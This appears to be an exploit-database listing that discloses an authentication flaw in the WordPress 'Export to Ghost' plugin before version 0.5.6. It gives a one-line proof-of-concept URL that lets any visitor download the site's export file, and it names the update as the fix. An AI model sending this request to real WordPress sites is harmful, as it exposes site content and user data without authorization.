Home / exploits WordPress Export to Ghost Unrestricted Export Download
Posted on 30 November -0001
<HTML><HEAD><TITLE>WordPress Export to Ghost Unrestricted Export Download</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY> Exploit Title: WordPress Export to Ghost Unrestricted Export Download # Date: 28-04-2016 # Software Link: https://wordpress.org/plugins/ghost # Exploit Author: Josh Brody # Contact: http://twitter.com/joshmn # Website: http://josh.mn/ # Category: webapps 1. Description Any visitor can download the Ghost Export file because of a failure to check if an admin user is properly authenticated. Assume all versions < 0.5.6 are vulnerable. 2. Proof of Concept http://example.com/wp-admin/tools.php?ghostexport=true&submit=Download+Ghost+file File will be downloaded. 3. Solution: Update to version 0.5.6 https://downloads.wordpress.org/plugin/ghost.0.5.6.zip </BODY></HTML>